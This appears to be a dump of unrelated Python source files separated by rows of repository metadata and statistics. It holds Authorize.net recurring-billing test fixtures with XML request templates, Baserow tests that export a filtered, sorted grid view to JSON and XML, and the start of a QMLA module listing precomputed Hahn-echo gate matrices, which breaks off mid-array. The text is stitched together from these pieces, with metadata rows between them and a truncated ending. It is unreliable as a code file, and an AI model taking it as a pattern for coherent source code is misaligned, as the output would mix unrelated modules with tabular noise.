UPDATE_RECURRING_NO_PAYMENT_REQUEST = '''
<?xml version="1.0" ?>
<ARBUpdateSubscriptionRequest xmlns="AnetApi/xml/v1/schema/AnetApiSchema.xsd">
<merchantAuthentication>
<name>8s8tVnG5t</name>
<transactionKey>5GK7mncw8mG2946z</transactionKey>
</merchantAuthentication>
<subscriptionId>0932576929034</subscriptionId>
<subscription>
<name>Ultimate Robot Supreme Plan</name>
<paymentSchedule>
<startDate>{0}</startDate>
<totalOccurrences>30</totalOccurrences>
<trialOccurrences>2</trialOccurrences>
</paymentSchedule>
<amount>40.00</amount>
<trialAmount>30.00</trialAmount>
<order>
<invoiceNumber>INV0001</invoiceNumber>
<description>Just another invoice...</description>
</order>
<customer>
<id>1234567890</id>
<email>rob@robotronstudios.com</email>
</customer>
<billTo>
<firstName>Rob</firstName>
<lastName>Oteron</lastName>
<company>Robotron Studios</company>
<address>101 Computer Street</address>
<city>Tucson</city>
<state>AZ</state>
<zip>85704</zip>
<country>US</country>
</billTo>
<shipTo>
<firstName>Rob</firstName>
<lastName>Oteron</lastName>
<company>Robotron Studios</company>
<address>101 Computer Street</address>
<city>Tucson</city>
<state>AZ</state>
<zip>85704</zip>
<country>US</country>
</shipTo>
</subscription>
</ARBUpdateSubscriptionRequest>
'''.format(date.today().isoformat())
UPDATE_RECURRING_PAYMENT_ONLY_REQUEST = '''
<?xml version="1.0" ?>
<ARBUpdateSubscriptionRequest xmlns="AnetApi/xml/v1/schema/AnetApiSchema.xsd">
<merchantAuthentication>
<name>8s8tVnG5t</name>
<transactionKey>5GK7mncw8mG2946z</transactionKey>
</merchantAuthentication>
<subscriptionId>0932576929034</subscriptionId>
<subscription>
<paymentSchedule/>
<payment>
<creditCard>
<cardNumber>4111111111111111</cardNumber>
<expirationDate>2014-04</expirationDate>
<cardCode>456</cardCode>
</creditCard>
</payment>
</subscription>
</ARBUpdateSubscriptionRequest>
'''
DELETE_RECURRING_REQUEST = '''
<?xml version="1.0" ?>
<ARBCancelSubscriptionRequest xmlns="AnetApi/xml/v1/schema/AnetApiSchema.xsd">
<merchantAuthentication>
<name>8s8tVnG5t</name>
<transactionKey>5GK7mncw8mG2946z</transactionKey>
</merchantAuthentication>
<subscriptionId>0932576929034</subscriptionId>
</ARBCancelSubscriptionRequest>
'''
class RecurringAPITests(TestCase):
    """Verify the recurring (ARB) API builds the expected request XML.

    Each test renders a request via the private ``_*_request`` builders on
    ``Configuration.api.recurring`` and compares the prettified XML against
    the canned fixtures defined above.
    """
    # Show full diffs for the long XML comparisons.
    maxDiff = None
    def test_create_recurring_request(self):
        """Create-subscription request matches CREATE_RECURRING_REQUEST."""
        request_xml = Configuration.api.recurring._create_request(CREATE_RECURRING)
        request_string = prettify(request_xml)
        self.assertEqual(request_string, CREATE_RECURRING_REQUEST.strip())
    def test_details_recurring_request(self):
        """Get-subscription request matches DETAILS_RECURRING_REQUEST."""
        request_xml = Configuration.api.recurring._details_request('0932576929034')
        request_string = prettify(request_xml)
        self.assertEqual(request_string, DETAILS_RECURRING_REQUEST.strip())
    def test_status_recurring_request(self):
        """Get-subscription-status request matches STATUS_RECURRING_REQUEST."""
        request_xml = Configuration.api.recurring._status_request('0932576929034')
        request_string = prettify(request_xml)
        self.assertEqual(request_string, STATUS_RECURRING_REQUEST.strip())
    def test_update_recurring_request(self):
        """Update requests match for full, payment-only and no-payment payloads."""
        request_xml = Configuration.api.recurring._update_request('0932576929034', UPDATE_RECURRING)
        request_string = prettify(request_xml)
        self.assertEqual(request_string, UPDATE_RECURRING_REQUEST.strip())
        request_xml = Configuration.api.recurring._update_request('0932576929034', UPDATE_RECURRING_PAYMENT_ONLY)
        request_string = prettify(request_xml)
        self.assertEqual(request_string, UPDATE_RECURRING_PAYMENT_ONLY_REQUEST.strip())
        request_xml = Configuration.api.recurring._update_request('0932576929034', UPDATE_RECURRING_NO_PAYMENT)
        request_string = prettify(request_xml)
        self.assertEqual(request_string, UPDATE_RECURRING_NO_PAYMENT_REQUEST.strip())
    def test_delete_recurring_request(self):
        """Cancel-subscription request matches DELETE_RECURRING_REQUEST."""
        request_xml = Configuration.api.recurring._delete_request('0932576929034')
        request_string = prettify(request_xml)
        self.assertEqual(request_string, DELETE_RECURRING_REQUEST.strip())
| 30.788462
| 113
| 0.661729
| 1,021
| 11,207
| 7.114594
| 0.132223
| 0.02891
| 0.030286
| 0.03304
| 0.890419
| 0.869631
| 0.852974
| 0.852974
| 0.811812
| 0.811812
| 0
| 0.067355
| 0.19586
| 11,207
| 363
| 114
| 30.873278
| 0.738682
| 0
| 0
| 0.80531
| 0
| 0
| 0.672348
| 0.307665
| 0
| 0
| 0
| 0
| 0.020649
| 1
| 0.014749
| false
| 0
| 0.011799
| 0
| 0.032448
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
07873eb573537bca2047393ff87735b4b7388285
| 9,568
|
py
|
Python
|
premium/backend/tests/baserow_premium/api/export/test_premium_export_views.py
|
lucastm/baserow
|
c5fd45b75c753cc5dfd3227902a79535fbe5ad0f
|
[
"MIT"
] | 839
|
2020-07-20T13:29:34.000Z
|
2022-03-31T21:09:16.000Z
|
premium/backend/tests/baserow_premium/api/export/test_premium_export_views.py
|
lucastm/baserow
|
c5fd45b75c753cc5dfd3227902a79535fbe5ad0f
|
[
"MIT"
] | 28
|
2020-08-07T09:23:58.000Z
|
2022-03-01T22:32:40.000Z
|
premium/backend/tests/baserow_premium/api/export/test_premium_export_views.py
|
lucastm/baserow
|
c5fd45b75c753cc5dfd3227902a79535fbe5ad0f
|
[
"MIT"
] | 79
|
2020-08-04T01:48:01.000Z
|
2022-03-27T13:30:54.000Z
|
from unittest.mock import patch
import pytest
from django.core.files.storage import FileSystemStorage
from django.urls import reverse
from django.utils.dateparse import parse_datetime
from django.utils.timezone import utc, make_aware
from freezegun import freeze_time
from rest_framework.fields import DateTimeField
from baserow.contrib.database.rows.handler import RowHandler
@pytest.mark.django_db
def test_exporting_json_writes_file_to_storage(
    data_fixture, api_client, tmpdir, settings, django_capture_on_commit_callbacks
):
    """End-to-end check that exporting a grid view as JSON writes the file.

    Builds a table with text/single-select/date fields and a filtered,
    sorted grid view; starts an export job over the API; then verifies the
    pending and complete job payloads and the JSON written to storage.
    """
    user, token = data_fixture.create_user_and_token()
    table = data_fixture.create_database_table(user=user)
    text_field = data_fixture.create_text_field(table=table, name="text_field", order=0)
    option_field = data_fixture.create_single_select_field(
        table=table, name="option_field", order=1
    )
    option_a = data_fixture.create_select_option(
        field=option_field, value="A", color="blue"
    )
    option_b = data_fixture.create_select_option(
        field=option_field, value="B", color="red"
    )
    date_field = data_fixture.create_date_field(
        table=table,
        date_include_time=True,
        date_format="US",
        name="date_field",
        order=2,
    )
    grid_view = data_fixture.create_grid_view(table=table)
    # Filter keeps rows whose text contains "test"; sort ascending by text.
    data_fixture.create_view_filter(
        view=grid_view, field=text_field, type="contains", value="test"
    )
    data_fixture.create_view_sort(view=grid_view, field=text_field, order="ASC")
    row_handler = RowHandler()
    row_handler.create_row(
        user=user,
        table=table,
        values={
            text_field.id: "test",
            date_field.id: "2020-02-01 01:23",
            option_field.id: option_b.id,
        },
    )
    row_handler.create_row(
        user=user,
        table=table,
        values={
            text_field.id: "atest",
            date_field.id: "2020-02-01 01:23",
            option_field.id: option_a.id,
        },
    )
    # Redirect the export handler's default storage into the pytest tmpdir.
    storage = FileSystemStorage(location=(str(tmpdir)), base_url="http://localhost")
    with patch("baserow.contrib.database.export.handler.default_storage", new=storage):
        run_time = make_aware(parse_datetime("2020-02-01 01:00"), timezone=utc)
        expected_created_at = DateTimeField().to_representation(run_time)
        with freeze_time(run_time):
            # Capturing on-commit callbacks makes the export run eagerly.
            with django_capture_on_commit_callbacks(execute=True):
                response = api_client.post(
                    reverse(
                        "api:database:export:export_table",
                        kwargs={"table_id": table.id},
                    ),
                    data={
                        "view_id": grid_view.id,
                        "exporter_type": "json",
                        "json_charset": "utf-8",
                    },
                    format="json",
                    HTTP_AUTHORIZATION=f"JWT {token}",
                )
            response_json = response.json()
            assert "id" in response_json
            job_id = response_json["id"]
            # Freshly created job: pending, no file, no URL yet.
            assert response_json == {
                "id": job_id,
                "created_at": expected_created_at,
                "exported_file_name": None,
                "exporter_type": "json",
                "progress_percentage": 0.0,
                "status": "pending",
                "table": table.id,
                "view": grid_view.id,
                "url": None,
            }
            response = api_client.get(
                reverse("api:database:export:get", kwargs={"job_id": job_id}),
                format="json",
                HTTP_AUTHORIZATION=f"JWT {token}",
            )
            response_json = response.json()
            assert "exported_file_name" in response_json
            filename = response_json["exported_file_name"]
            # The commit callbacks already ran the export, so it is complete.
            # NOTE(review): "(unknown)" in the URL literal below looks like a
            # mangled placeholder — a filename interpolation is expected
            # here; confirm against the upstream source.
            assert response_json == {
                "id": job_id,
                "created_at": expected_created_at,
                "exported_file_name": filename,
                "exporter_type": "json",
                "progress_percentage": 1.0,
                "status": "complete",
                "table": table.id,
                "view": grid_view.id,
                "url": f"http://localhost:8000/media/export_files/(unknown)",
            }
            file_path = tmpdir.join(settings.EXPORT_FILES_DIRECTORY, filename)
            assert file_path.isfile()
            # Rows arrive filtered (both contain "test") and sorted
            # ascending by text_field ("atest" before "test").
            expected = """[
{
    "id": 2,
    "text_field": "atest",
    "option_field": "A",
    "date_field": "02/01/2020 01:23"
},
{
    "id": 1,
    "text_field": "test",
    "option_field": "B",
    "date_field": "02/01/2020 01:23"
}
]
"""
            with open(file_path, "r", encoding="utf-8") as written_file:
                real = written_file.read()
                assert real == expected
@pytest.mark.django_db
def test_exporting_xml_writes_file_to_storage(
    data_fixture, api_client, tmpdir, settings, django_capture_on_commit_callbacks
):
    """End-to-end test of the XML table exporter.

    Builds a table with a text, single-select and US-format date field, a grid
    view filtered to rows containing "test" and sorted ascending by the text
    field, then triggers an export over the API and checks:

    * the initial POST response describes a pending job,
    * polling the job endpoint reports a completed job with a file URL, and
    * the exported XML file written to ``tmpdir`` has the expected content
      (filtered, sorted, with human-readable select/date values).
    """
    user, token = data_fixture.create_user_and_token()
    table = data_fixture.create_database_table(user=user)
    text_field = data_fixture.create_text_field(table=table, name="text_field", order=0)
    option_field = data_fixture.create_single_select_field(
        table=table, name="option_field", order=1
    )
    option_a = data_fixture.create_select_option(
        field=option_field, value="A", color="blue"
    )
    option_b = data_fixture.create_select_option(
        field=option_field, value="B", color="red"
    )
    date_field = data_fixture.create_date_field(
        table=table,
        date_include_time=True,
        date_format="US",
        name="date_field",
        order=2,
    )
    grid_view = data_fixture.create_grid_view(table=table)
    # The filter and sort must be reflected in the exported file: only rows
    # containing "test", ordered ascending by text_field ("atest" before "test").
    data_fixture.create_view_filter(
        view=grid_view, field=text_field, type="contains", value="test"
    )
    data_fixture.create_view_sort(view=grid_view, field=text_field, order="ASC")
    row_handler = RowHandler()
    row_handler.create_row(
        user=user,
        table=table,
        values={
            text_field.id: "test",
            date_field.id: "2020-02-01 01:23",
            option_field.id: option_b.id,
        },
    )
    row_handler.create_row(
        user=user,
        table=table,
        values={
            text_field.id: "atest",
            date_field.id: "2020-02-01 01:23",
            option_field.id: option_a.id,
        },
    )
    # Redirect the export handler's storage into the test's tmpdir so the
    # produced file can be inspected on disk.
    storage = FileSystemStorage(location=(str(tmpdir)), base_url="http://localhost")
    with patch("baserow.contrib.database.export.handler.default_storage", new=storage):
        run_time = make_aware(parse_datetime("2020-02-01 01:00"), timezone=utc)
        with freeze_time(run_time):
            # Serialize run_time the same way the API does so the created_at
            # comparison below is format-exact.
            expected_created_at = DateTimeField().to_representation(run_time)
            with django_capture_on_commit_callbacks(execute=True):
                response = api_client.post(
                    reverse(
                        "api:database:export:export_table",
                        kwargs={"table_id": table.id},
                    ),
                    data={
                        "view_id": grid_view.id,
                        "exporter_type": "xml",
                        "xml_charset": "utf-8",
                    },
                    format="json",
                    HTTP_AUTHORIZATION=f"JWT {token}",
                )
            response_json = response.json()
            assert "id" in response_json
            job_id = response_json["id"]
            assert response_json == {
                "id": job_id,
                "created_at": expected_created_at,
                "exported_file_name": None,
                "exporter_type": "xml",
                "progress_percentage": 0.0,
                "status": "pending",
                "table": table.id,
                "view": grid_view.id,
                "url": None,
            }
            # The on-commit callbacks already ran the export task, so polling
            # the job endpoint must now report a completed job.
            response = api_client.get(
                reverse("api:database:export:get", kwargs={"job_id": job_id}),
                format="json",
                HTTP_AUTHORIZATION=f"JWT {token}",
            )
            response_json = response.json()
            assert "exported_file_name" in response_json
            filename = response_json["exported_file_name"]
            assert response_json == {
                "id": job_id,
                "created_at": expected_created_at,
                "exported_file_name": filename,
                "exporter_type": "xml",
                "progress_percentage": 1.0,
                "status": "complete",
                "table": table.id,
                "view": grid_view.id,
                # Bug fix: the expected URL must contain the exported file's
                # name; previously the f-string had no placeholder so this
                # equality could never hold.
                "url": f"http://localhost:8000/media/export_files/{filename}",
            }
            file_path = tmpdir.join(settings.EXPORT_FILES_DIRECTORY, filename)
            assert file_path.isfile()
            expected = """<?xml version="1.0" encoding="utf-8" ?>
<rows>
  <row>
    <id>2</id>
    <text-field>atest</text-field>
    <option-field>A</option-field>
    <date-field>02/01/2020 01:23</date-field>
  </row>
  <row>
    <id>1</id>
    <text-field>test</text-field>
    <option-field>B</option-field>
    <date-field>02/01/2020 01:23</date-field>
  </row>
</rows>
"""
            with open(file_path, "r", encoding="utf-8") as written_file:
                xml = written_file.read()
                # Compare whitespace-insensitively; only element structure and
                # text content matter.
                assert strip_indents_and_newlines(xml) == strip_indents_and_newlines(
                    expected
                )
def strip_indents_and_newlines(xml):
    """Collapse *xml* into one line by stripping whitespace around every line.

    Splits on newline characters, strips each resulting piece, and glues the
    pieces back together with no separator, making whitespace-insensitive
    comparisons of XML documents possible.
    """
    stripped_pieces = []
    for piece in xml.split("\n"):
        stripped_pieces.append(piece.strip())
    return "".join(stripped_pieces)
| 35.568773
| 88
| 0.569293
| 1,078
| 9,568
| 4.7718
| 0.144712
| 0.047045
| 0.066096
| 0.025661
| 0.873639
| 0.854782
| 0.854782
| 0.833398
| 0.833398
| 0.813375
| 0
| 0.02332
| 0.314277
| 9,568
| 268
| 89
| 35.701493
| 0.760707
| 0
| 0
| 0.722222
| 0
| 0
| 0.184783
| 0.040029
| 0
| 0
| 0
| 0
| 0.047619
| 1
| 0.011905
| false
| 0
| 0.035714
| 0.003968
| 0.051587
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
0788b477045d6b36b5e0a953e4af2405b20c6bba
| 349,884
|
py
|
Python
|
qmla/shared_functionality/hahn_inversion_gates.py
|
Evan1415/QMLA
|
4521f7c08456a4494aed7c1b78d8ded5ea40f3d8
|
[
"MIT"
] | null | null | null |
qmla/shared_functionality/hahn_inversion_gates.py
|
Evan1415/QMLA
|
4521f7c08456a4494aed7c1b78d8ded5ea40f3d8
|
[
"MIT"
] | null | null | null |
qmla/shared_functionality/hahn_inversion_gates.py
|
Evan1415/QMLA
|
4521f7c08456a4494aed7c1b78d8ded5ea40f3d8
|
[
"MIT"
] | null | null | null |
r"""
For NV experiment (Bristol, 2019), the same Hahn echo gate is applied many times.
Rather than compute the exponential to find the gate each time,
they are stored here instead.
"""
from numpy import array
precomputed_hahn_z_inversion_gates = {1: array([[0. - 1.j, 0. + 0.j],
[0. + 0.j, 0. + 1.j]]), 2: array([[0. - 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. - 1.j,
0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j,
0. + 1.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 1.j]]), 3: array([[0. - 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[
0. + 0.j, 0. - 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[
0. + 0.j, 0. + 0.j, 0. - 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. - 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. +
0.j, 0. +
0.j, 0. +
0.j, 0. +
0.j, 0. +
1.j, 0. +
0.j, 0. +
0.j, 0. +
0.j],
[0. +
0.j, 0. +
0.j, 0. +
0.j, 0. +
0.j, 0. +
0.j, 0. +
1.j, 0. +
0.j, 0. +
0.j],
[0. +
0.j, 0. +
0.j, 0. +
0.j, 0. +
0.j, 0. +
0.j, 0. +
0.j, 0. +
1.j, 0. +
0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 1.j]]), 4: array([[0. - 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. - 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. - 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. - 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. - 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. - 1.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. - 1.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. - 1.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 1.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 1.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 1.j]]), 5: array([[0. - 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. - 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. - 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. - 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. - 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. - 1.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. - 1.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. - 1.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. - 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. - 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. - 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. - 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. - 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. - 1.j, 0. + 0.j, 0. + 0.j,
